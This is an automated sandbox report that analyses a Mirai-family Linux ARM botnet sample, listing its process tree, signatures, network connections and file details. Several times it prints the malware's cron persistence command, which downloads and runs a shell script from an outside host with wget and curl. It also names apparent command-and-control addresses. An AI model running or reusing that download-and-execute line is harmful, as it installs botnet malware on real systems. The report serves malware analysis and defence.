Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nsharm5.elf

Overview

General Information

Sample name:nsharm5.elf
Analysis ID:1552884
MD5:b706720902b7adc6af5d5bdaacbdeb35
SHA1:c11ff4eacf28918978980f5bb13b85e5a767b9f7
SHA256:34a9f4f587030b5834bf3194024722c22127e2d98c1f7542587abcffeebe7c7e
Tags:elfuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1552884
Start date and time:2024-11-09 21:27:05 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 38s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:nsharm5.elf
Detection:MAL
Classification:mal60.troj.linELF@0/1@9/0
  • VT rate limit hit for: nsharm5.elf
Command:/tmp/nsharm5.elf
PID:6235
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • nsharm5.elf (PID: 6235, Parent: 6160, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/nsharm5.elf
    • sh (PID: 6237, Parent: 6235, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 6239, Parent: 6237)
        • sh New Fork (PID: 6241, Parent: 6239)
        • crontab (PID: 6241, Parent: 6239, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 6240, Parent: 6237)
      • crontab (PID: 6240, Parent: 6237, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: nsharm5.elfReversingLabs: Detection: 13%
Source: tmp.WFPhf0.18.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global trafficTCP traffic: 193.233.193.45 ports 15260,17753,1,3,6,8,1638
Source: global trafficTCP traffic: 192.168.2.23:44168 -> 193.233.193.45:1638
Source: global trafficTCP traffic: 192.168.2.23:43658 -> 86.107.100.80:8493
Source: global trafficTCP traffic: 192.168.2.23:40512 -> 91.149.238.18:1571
Source: global trafficTCP traffic: 192.168.2.23:42744 -> 91.149.218.232:5202
Source: /tmp/nsharm5.elf (PID: 6235)Socket: 127.0.0.1:1172Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: tmp.WFPhf0.18.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal60.troj.linELF@0/1@9/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6241)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 6240)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 6240)File: /var/spool/cron/crontabs/tmp.WFPhf0Jump to behavior
Source: /usr/bin/crontab (PID: 6240)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/nsharm5.elf (PID: 6237)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/nsharm5.elf (PID: 6235)Queries kernel information via 'uname': Jump to behavior
Source: nsharm5.elf, 6235.1.0000562c929c4000.0000562c92b3a000.rw-.sdmp, nsharm5.elf, 6242.1.0000562c929c4000.0000562c92b3a000.rw-.sdmp, nsharm5.elf, 6285.1.0000562c929c4000.0000562c92b3a000.rw-.sdmpBinary or memory string: ,V!/etc/qemu-binfmt/arm
Source: nsharm5.elf, 6235.1.0000562c929c4000.0000562c92b3a000.rw-.sdmp, nsharm5.elf, 6242.1.0000562c929c4000.0000562c92b3a000.rw-.sdmp, nsharm5.elf, 6285.1.0000562c929c4000.0000562c92b3a000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: nsharm5.elf, 6235.1.00007fff26027000.00007fff26048000.rw-.sdmp, nsharm5.elf, 6242.1.00007fff26027000.00007fff26048000.rw-.sdmp, nsharm5.elf, 6285.1.00007fff26027000.00007fff26048000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: nsharm5.elf, 6285.1.00007fff26027000.00007fff26048000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: nsharm5.elf, 6235.1.00007fff26027000.00007fff26048000.rw-.sdmp, nsharm5.elf, 6242.1.00007fff26027000.00007fff26048000.rw-.sdmp, nsharm5.elf, 6285.1.00007fff26027000.00007fff26048000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/nsharm5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nsharm5.elf
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
Direct Volume AccessOS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1552884 Sample: nsharm5.elf Startdate: 09/11/2024 Architecture: LINUX Score: 60 30 193.233.193.45, 15260, 1638, 17753 FREE-NET-ASFREEnetEU Russian Federation 2->30 32 91.149.238.18, 1571, 23522, 40022 MARTON-ASPL Poland 2->32 34 6 other IPs or domains 2->34 40 Multi AV Scanner detection for submitted file 2->40 42 Connects to many ports of the same IP (likely port scanning) 2->42 9 nsharm5.elf 2->9         started        signatures3 process4 process5 11 nsharm5.elf sh 9->11         started        13 nsharm5.elf 9->13         started        15 nsharm5.elf 9->15         started        process6 17 sh crontab 11->17         started        21 sh 11->21         started        23 nsharm5.elf 13->23         started        file7 28 /var/spool/cron/crontabs/tmp.WFPhf0, ASCII 17->28 dropped 36 Sample tries to persist itself using cron 17->36 38 Executes the "crontab" command typically for achieving persistence 17->38 25 sh crontab 21->25         started        signatures8 process9 signatures10 44 Executes the "crontab" command typically for achieving persistence 25->44
SourceDetectionScannerLabelLink
nsharm5.elf13%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
kingstonwikkerink.dyn
217.28.130.41
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http://hailcocks.ru/wget.sh;tmp.WFPhf0.18.drfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      193.233.193.45
      unknownRussian Federation
      2895FREE-NET-ASFREEnetEUtrue
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      91.149.218.232
      unknownPoland
      198401GECKONET-ASPLfalse
      86.107.100.80
      unknownRomania
      38995AMG-ASROfalse
      91.149.238.18
      unknownPoland
      41952MARTON-ASPLfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      193.233.193.45nsharm.elfGet hashmaliciousUnknownBrowse
        nshppc.elfGet hashmaliciousUnknownBrowse
          nshmips.elfGet hashmaliciousUnknownBrowse
            arm7.elfGet hashmaliciousUnknownBrowse
              mpsl.elfGet hashmaliciousUnknownBrowse
                arm5.elfGet hashmaliciousUnknownBrowse
                  arm4.elfGet hashmaliciousUnknownBrowse
                    mpsl.elfGet hashmaliciousUnknownBrowse
                      arm7-20241104-0018.elfGet hashmaliciousUnknownBrowse
                        na.elfGet hashmaliciousUnknownBrowse
                          109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                          • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                          91.149.218.232nsharm.elfGet hashmaliciousUnknownBrowse
                            nshppc.elfGet hashmaliciousUnknownBrowse
                              nshmips.elfGet hashmaliciousUnknownBrowse
                                arm7.elfGet hashmaliciousUnknownBrowse
                                  mpsl.elfGet hashmaliciousUnknownBrowse
                                    arm5.elfGet hashmaliciousUnknownBrowse
                                      arm4.elfGet hashmaliciousUnknownBrowse
                                        mpsl.elfGet hashmaliciousUnknownBrowse
                                          arm7-20241104-0018.elfGet hashmaliciousUnknownBrowse
                                            arm4-20241104-0018.elfGet hashmaliciousUnknownBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              kingstonwikkerink.dynnsharm.elfGet hashmaliciousUnknownBrowse
                                              • 81.29.149.178
                                              nshppc.elfGet hashmaliciousUnknownBrowse
                                              • 217.28.130.41
                                              nshmips.elfGet hashmaliciousUnknownBrowse
                                              • 31.13.248.89
                                              ppc.elfGet hashmaliciousMiraiBrowse
                                              • 91.149.238.18
                                              tarm7.elfGet hashmaliciousMiraiBrowse
                                              • 213.182.204.57
                                              tppc.elfGet hashmaliciousMiraiBrowse
                                              • 88.151.195.22
                                              harm5.elfGet hashmaliciousUnknownBrowse
                                              • 217.28.130.41
                                              tarm.elfGet hashmaliciousMiraiBrowse
                                              • 88.151.195.22
                                              tmpsl.elfGet hashmaliciousMiraiBrowse
                                              • 86.107.100.80
                                              harm4.elfGet hashmaliciousUnknownBrowse
                                              • 81.29.149.178
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              INIT7CHarm7.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              nshppc.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              nshmips.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              main_ppc.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              main_arm5.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              main_m68k.elfGet hashmaliciousMiraiBrowse
                                              • 109.202.202.202
                                              dlr.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 109.202.202.202
                                              sarm7.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              8DyqLn07Y2.elfGet hashmaliciousMiraiBrowse
                                              • 109.202.202.202
                                              dwhdbg.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 109.202.202.202
                                              GECKONET-ASPLnsharm.elfGet hashmaliciousUnknownBrowse
                                              • 91.149.218.232
                                              nshppc.elfGet hashmaliciousUnknownBrowse
                                              • 91.149.218.232
                                              nshmips.elfGet hashmaliciousUnknownBrowse
                                              • 91.149.218.232
                                              arm7.elfGet hashmaliciousUnknownBrowse
                                              • 91.149.218.232
                                              mpsl.elfGet hashmaliciousUnknownBrowse
                                              • 91.149.218.232
                                              arm5.elfGet hashmaliciousUnknownBrowse
                                              • 91.149.218.232
                                              arm4.elfGet hashmaliciousUnknownBrowse
                                              • 91.149.218.232
                                              mpsl.elfGet hashmaliciousUnknownBrowse
                                              • 91.149.218.232
                                              arm7-20241104-0018.elfGet hashmaliciousUnknownBrowse
                                              • 91.149.218.232
                                              arm4-20241104-0018.elfGet hashmaliciousUnknownBrowse
                                              • 91.149.218.232
                                              FREE-NET-ASFREEnetEUnsharm.elfGet hashmaliciousUnknownBrowse
                                              • 193.233.193.45
                                              nshppc.elfGet hashmaliciousUnknownBrowse
                                              • 193.233.193.45
                                              nshmips.elfGet hashmaliciousUnknownBrowse
                                              • 193.233.193.45
                                              boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                              • 147.45.42.138
                                              boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 147.45.42.138
                                              boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                              • 147.45.42.138
                                              boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                              • 147.45.42.138
                                              TZ33WZy6QL.exeGet hashmaliciousLummaCBrowse
                                              • 147.45.44.131
                                              boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                              • 147.45.42.138
                                              7YHOFCgxpw.elfGet hashmaliciousMiraiBrowse
                                              • 147.45.42.138
                                              No context
                                              No context
                                              Process:/usr/bin/crontab
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):306
                                              Entropy (8bit):5.156619356647554
                                              Encrypted:false
                                              SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQucBOvZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXA:8QjHig8uGQeHLUHYC+GABjnOGAFkz
                                              MD5:59CEC241B20E6800B4C77317CCEEA89E
                                              SHA1:12854F6764E838EA46B2FEF898F430C9C7839AA0
                                              SHA-256:37D2A29963C9CFECCCF332113DC03C7EA3029D501040B23A8B3B28CB829B773F
                                              SHA-512:6AE875CF8A44685DA993119278313A1624F4DA66E100D8A671F60946CC9A2CBF3618CFC69110D9D79D480510388FF016D6AF00946F0EF7DC74081A6386EBD63F
                                              Malicious:true
                                              Reputation:low
                                              Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Nov 9 14:27:48 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                              File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                              Entropy (8bit):6.066542304045217
                                              TrID:
                                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                              File name:nsharm5.elf
                                              File size:75'108 bytes
                                              MD5:b706720902b7adc6af5d5bdaacbdeb35
                                              SHA1:c11ff4eacf28918978980f5bb13b85e5a767b9f7
                                              SHA256:34a9f4f587030b5834bf3194024722c22127e2d98c1f7542587abcffeebe7c7e
                                              SHA512:71c9b7a9e85fcd1fa98ac661a5093b7f1ed4e7f817f09c6844eac44b440ad4fe034d306a9a2f779bc8ec9cd2bda1538b03c54164d33415a910f8abf96c5d5773
                                              SSDEEP:1536:DMibgMZMtBlCIi5XtllOZJV4ZyxQEMdk:DMsHZolY9zOZJTxXL
                                              TLSH:A5732A45BD819A12C6D021BBFB6E428D772653A8D3EF3213DD256F20778782B0E77641
                                              File Content Preview:.ELF...a..........(.........4....#......4. ...(.......................................... ... ... .......T..........Q.td..................................-...L."...X@..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                              ELF header

                                              Class:ELF32
                                              Data:2's complement, little endian
                                              Version:1 (current)
                                              Machine:ARM
                                              Version Number:0x1
                                              Type:EXEC (Executable file)
                                              OS/ABI:ARM - ABI
                                              ABI Version:0
                                              Entry Point Address:0x8190
                                              Flags:0x2
                                              ELF Header Size:52
                                              Program Header Offset:52
                                              Program Header Size:32
                                              Number of Program Headers:3
                                              Section Header Offset:74708
                                              Section Header Size:40
                                              Number of Section Headers:10
                                              Header String Table Index:9
                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                              NULL0x00x00x00x00x0000
                                              .initPROGBITS0x80940x940x180x00x6AX004
                                              .textPROGBITS0x80b00xb00x101980x00x6AX0016
                                              .finiPROGBITS0x182480x102480x140x00x6AX004
                                              .rodataPROGBITS0x1825c0x1025c0x19a00x00x2A004
                                              .ctorsPROGBITS0x220000x120000x80x00x3WA004
                                              .dtorsPROGBITS0x220080x120080x80x00x3WA004
                                              .dataPROGBITS0x220140x120140x3800x00x3WA004
                                              .bssNOBITS0x223940x123940x50fc0x00x3WA004
                                              .shstrtabSTRTAB0x00x123940x3e0x00x0001
                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                              LOAD0x00x80000x80000x11bfc0x11bfc6.14530x5R E0x8000.init .text .fini .rodata
                                              LOAD0x120000x220000x220000x3940x54902.86350x6RW 0x8000.ctors .dtors .data .bss
                                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 9, 2024 21:27:49.478724957 CET441681638192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:27:49.483644962 CET163844168193.233.193.45192.168.2.23
                                              Nov 9, 2024 21:27:49.483694077 CET441681638192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:27:49.501722097 CET441681638192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:27:49.506537914 CET163844168193.233.193.45192.168.2.23
                                              Nov 9, 2024 21:27:49.506583929 CET441681638192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:27:49.511409044 CET163844168193.233.193.45192.168.2.23
                                              Nov 9, 2024 21:27:50.843491077 CET163844168193.233.193.45192.168.2.23
                                              Nov 9, 2024 21:27:50.843569994 CET441681638192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:27:50.843750000 CET441681638192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:27:51.386655092 CET43928443192.168.2.2391.189.91.42
                                              Nov 9, 2024 21:27:55.873667955 CET4466015260192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:27:55.878599882 CET1526044660193.233.193.45192.168.2.23
                                              Nov 9, 2024 21:27:55.878676891 CET4466015260192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:27:55.878690958 CET4466015260192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:27:55.883797884 CET1526044660193.233.193.45192.168.2.23
                                              Nov 9, 2024 21:27:55.883884907 CET4466015260192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:27:55.888741970 CET1526044660193.233.193.45192.168.2.23
                                              Nov 9, 2024 21:27:56.761923075 CET42836443192.168.2.2391.189.91.43
                                              Nov 9, 2024 21:27:57.230550051 CET1526044660193.233.193.45192.168.2.23
                                              Nov 9, 2024 21:27:57.230706930 CET4466015260192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:27:57.230746031 CET4466015260192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:27:58.553735971 CET4251680192.168.2.23109.202.202.202
                                              Nov 9, 2024 21:28:02.244240999 CET3629017753192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:28:02.249037981 CET1775336290193.233.193.45192.168.2.23
                                              Nov 9, 2024 21:28:02.249098063 CET3629017753192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:28:02.249110937 CET3629017753192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:28:02.253940105 CET1775336290193.233.193.45192.168.2.23
                                              Nov 9, 2024 21:28:02.253988028 CET3629017753192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:28:02.258816957 CET1775336290193.233.193.45192.168.2.23
                                              Nov 9, 2024 21:28:03.598331928 CET1775336290193.233.193.45192.168.2.23
                                              Nov 9, 2024 21:28:03.598555088 CET3629017753192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:28:03.598639965 CET3629017753192.168.2.23193.233.193.45
                                              Nov 9, 2024 21:28:12.887703896 CET43928443192.168.2.2391.189.91.42
                                              Nov 9, 2024 21:28:13.618793011 CET436588493192.168.2.2386.107.100.80
                                              Nov 9, 2024 21:28:13.623657942 CET84934365886.107.100.80192.168.2.23
                                              Nov 9, 2024 21:28:13.623758078 CET436588493192.168.2.2386.107.100.80
                                              Nov 9, 2024 21:28:13.623802900 CET436588493192.168.2.2386.107.100.80
                                              Nov 9, 2024 21:28:13.628587961 CET84934365886.107.100.80192.168.2.23
                                              Nov 9, 2024 21:28:13.628657103 CET436588493192.168.2.2386.107.100.80
                                              Nov 9, 2024 21:28:13.633434057 CET84934365886.107.100.80192.168.2.23
                                              Nov 9, 2024 21:28:15.158677101 CET84934365886.107.100.80192.168.2.23
                                              Nov 9, 2024 21:28:15.158971071 CET436588493192.168.2.2386.107.100.80
                                              Nov 9, 2024 21:28:15.159149885 CET436588493192.168.2.2386.107.100.80
                                              Nov 9, 2024 21:28:23.126207113 CET42836443192.168.2.2391.189.91.43
                                              Nov 9, 2024 21:28:25.195940018 CET405121571192.168.2.2391.149.238.18
                                              Nov 9, 2024 21:28:25.200797081 CET15714051291.149.238.18192.168.2.23
                                              Nov 9, 2024 21:28:25.200875998 CET405121571192.168.2.2391.149.238.18
                                              Nov 9, 2024 21:28:25.200918913 CET405121571192.168.2.2391.149.238.18
                                              Nov 9, 2024 21:28:25.205781937 CET15714051291.149.238.18192.168.2.23
                                              Nov 9, 2024 21:28:25.205887079 CET405121571192.168.2.2391.149.238.18
                                              Nov 9, 2024 21:28:25.210911036 CET15714051291.149.238.18192.168.2.23
                                              Nov 9, 2024 21:28:26.081696987 CET15714051291.149.238.18192.168.2.23
                                              Nov 9, 2024 21:28:26.081964016 CET405121571192.168.2.2391.149.238.18
                                              Nov 9, 2024 21:28:26.081995010 CET15714051291.149.238.18192.168.2.23
                                              Nov 9, 2024 21:28:26.082056999 CET405121571192.168.2.2391.149.238.18
                                              Nov 9, 2024 21:28:26.082086086 CET405121571192.168.2.2391.149.238.18
                                              Nov 9, 2024 21:28:29.269318104 CET4251680192.168.2.23109.202.202.202
                                              Nov 9, 2024 21:28:31.112308025 CET4002223522192.168.2.2391.149.238.18
                                              Nov 9, 2024 21:28:31.117131948 CET235224002291.149.238.18192.168.2.23
                                              Nov 9, 2024 21:28:31.117221117 CET4002223522192.168.2.2391.149.238.18
                                              Nov 9, 2024 21:28:31.117255926 CET4002223522192.168.2.2391.149.238.18
                                              Nov 9, 2024 21:28:31.122033119 CET235224002291.149.238.18192.168.2.23
                                              Nov 9, 2024 21:28:31.122091055 CET4002223522192.168.2.2391.149.238.18
                                              Nov 9, 2024 21:28:31.126868963 CET235224002291.149.238.18192.168.2.23
                                              Nov 9, 2024 21:28:32.008474112 CET235224002291.149.238.18192.168.2.23
                                              Nov 9, 2024 21:28:32.008744955 CET4002223522192.168.2.2391.149.238.18
                                              Nov 9, 2024 21:28:32.008822918 CET235224002291.149.238.18192.168.2.23
                                              Nov 9, 2024 21:28:32.008827925 CET4002223522192.168.2.2391.149.238.18
                                              Nov 9, 2024 21:28:32.008975983 CET4002223522192.168.2.2391.149.238.18
                                              Nov 9, 2024 21:28:37.053561926 CET427445202192.168.2.2391.149.218.232
                                              Nov 9, 2024 21:28:37.058397055 CET52024274491.149.218.232192.168.2.23
                                              Nov 9, 2024 21:28:37.058465004 CET427445202192.168.2.2391.149.218.232
                                              Nov 9, 2024 21:28:37.058522940 CET427445202192.168.2.2391.149.218.232
                                              Nov 9, 2024 21:28:37.063333035 CET52024274491.149.218.232192.168.2.23
                                              Nov 9, 2024 21:28:37.063379049 CET427445202192.168.2.2391.149.218.232
                                              Nov 9, 2024 21:28:37.068228006 CET52024274491.149.218.232192.168.2.23
                                              Nov 9, 2024 21:28:47.067367077 CET427445202192.168.2.2391.149.218.232
                                              Nov 9, 2024 21:28:47.072443008 CET52024274491.149.218.232192.168.2.23
                                              Nov 9, 2024 21:28:47.336330891 CET52024274491.149.218.232192.168.2.23
                                              Nov 9, 2024 21:28:47.336543083 CET427445202192.168.2.2391.149.218.232
                                              Nov 9, 2024 21:28:53.841839075 CET43928443192.168.2.2391.189.91.42
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 9, 2024 21:27:49.435185909 CET4828053192.168.2.2351.158.108.203
                                              Nov 9, 2024 21:27:49.450464964 CET534828051.158.108.203192.168.2.23
                                              Nov 9, 2024 21:27:49.572516918 CET4154953192.168.2.2351.158.108.203
                                              Nov 9, 2024 21:27:49.587658882 CET534154951.158.108.203192.168.2.23
                                              Nov 9, 2024 21:27:55.845915079 CET4080753192.168.2.23217.160.70.42
                                              Nov 9, 2024 21:27:55.873174906 CET5340807217.160.70.42192.168.2.23
                                              Nov 9, 2024 21:28:02.233181000 CET4445753192.168.2.23202.61.197.122
                                              Nov 9, 2024 21:28:02.243647099 CET5344457202.61.197.122192.168.2.23
                                              Nov 9, 2024 21:28:08.601080894 CET3574753192.168.2.23139.84.165.176
                                              Nov 9, 2024 21:28:13.607413054 CET5151753192.168.2.23194.36.144.87
                                              Nov 9, 2024 21:28:13.617757082 CET5351517194.36.144.87192.168.2.23
                                              Nov 9, 2024 21:28:20.161930084 CET3356453192.168.2.2370.34.254.19
                                              Nov 9, 2024 21:28:25.167836905 CET5587253192.168.2.2381.169.136.222
                                              Nov 9, 2024 21:28:25.195128918 CET535587281.169.136.222192.168.2.23
                                              Nov 9, 2024 21:28:31.084407091 CET4090453192.168.2.23217.160.70.42
                                              Nov 9, 2024 21:28:31.111555099 CET5340904217.160.70.42192.168.2.23
                                              Nov 9, 2024 21:28:37.011291027 CET5264753192.168.2.2380.152.203.134
                                              Nov 9, 2024 21:28:37.052897930 CET535264780.152.203.134192.168.2.23
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Nov 9, 2024 21:27:49.435185909 CET192.168.2.2351.158.108.2030x62c3Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:27:55.845915079 CET192.168.2.23217.160.70.420x3fc2Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:02.233181000 CET192.168.2.23202.61.197.1220xe924Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:08.601080894 CET192.168.2.23139.84.165.1760xcfaaStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:13.607413054 CET192.168.2.23194.36.144.870x6fdeStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                              Nov 9, 2024 21:28:20.161930084 CET192.168.2.2370.34.254.190x3c54Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
